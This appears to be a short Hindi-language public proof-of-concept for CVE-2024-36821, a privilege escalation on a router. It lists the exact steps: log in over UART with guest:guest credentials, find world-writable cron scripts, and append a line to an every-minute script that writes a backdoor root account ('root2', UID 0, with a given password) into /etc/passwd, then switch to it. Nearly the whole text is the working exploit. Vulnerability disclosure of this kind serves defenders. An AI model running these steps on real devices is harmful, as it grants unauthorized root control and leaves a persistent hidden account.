
सार्वजनिक संदर्भ जिसमें CVE-2024-36821 द्वारा कवर की गई भेद्यता के लिए न्यूनतम आवश्यक जानकारी शामिल है
CVE-2024-36821 द्वारा कवर की गई कमजोरी के लिए आवश्यक न्यूनतम जानकारी वाला सार्वजनिक संदर्भ
UART कनेक्शन के माध्यम से राउटर से कनेक्ट करें
guest:guest क्रेडेंशियल का उपयोग करके, सिस्टम में लॉग इन करें
find / -perm -777 -type f 2>/dev/null कमांड का उपयोग करके, read-write-execute अनुमतियों वाली फ़ाइलें खोजें:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh कमांड द्वारा स्वामी की जाँच करें
openssl passwd Abracadabra कमांड द्वारा पासवर्ड जनरेट करें
/tmp/cron/cron.everyminute/conntrack_collector.sh को संपादित करें, अंत में नया जनरेट किया गया पासवर्ड जोड़ें:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
एक मिनट प्रतीक्षा करें
निम्नलिखित कमांड द्वारा root2 उपयोगकर्ता में स्विच करें
/ $ su root2
Password: Abracadabra
~ #